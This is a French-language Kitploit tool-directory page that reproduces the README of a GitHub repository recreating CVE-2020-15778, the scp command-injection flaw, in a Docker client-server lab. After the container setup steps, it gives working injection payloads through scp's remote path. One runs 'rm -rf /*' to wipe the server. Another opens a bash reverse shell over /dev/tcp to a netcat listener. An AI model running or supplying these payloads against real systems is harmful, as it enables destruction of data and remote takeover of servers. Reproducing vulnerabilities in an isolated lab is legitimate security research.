Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-15778 — Reproduit l'exploit d'injection de commandes SCP CVE-2020-15778 avec une configuration client-serveur basée sur Docker pour tester l'exécution de code à distance et les charges utiles de reverse shell. | Kitploit
Outils/GitHubGitHub/yifanzhg/cve-2020-15778
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

Reproduit l'exploit d'injection de commandes SCP CVE-2020-15778 avec une configuration client-serveur basée sur Docker pour tester l'exécution de code à distance et les charges utiles de reverse shell.

Voir le dépôt
33il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-15778

Introduction

Ce dépôt reproduit CVE-2020-15778.

Étapes

  1. Construisez les images docker pour le serveur et le client scp
root@kitploit:~
cd client
docker build -t client-cve .
root@kitploit:~
cd server
docker build -t server-cve .
  1. Lancez le serveur scp dans un conteneur.
root@kitploit:~
docker run -d -P --name scp-server server-cve

Récupérez l'adresse IP interne du serveur scp avec

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. Exécutez le client dans un conteneur.
root@kitploit:~
docker run --name scp-client -i -t client-cve
  1. Injectez votre propre commande shell dans le serveur scp en appelant la commande scp depuis le client.

Dans le terminal du client, exécutez

root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'

Le mot de passe est "PASSWORD".

Exemples

Voici quelques exemples pour cette exploitation.

  1. Supprimez tout sur le serveur pour le faire planter.
root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
  1. Réflétez le bash du serveur scp vers le client (imitation ssh).

Écoutez un port sur la machine cliente.

root@kitploit:~
nc -lvvp 8080

Utilisez scp pour forcer le serveur à mapper le bash interactif vers la machine cliente.

root@kitploit:~
scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'

L'adresse IP du client peut être récupérée avec

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
Télécharger l’outil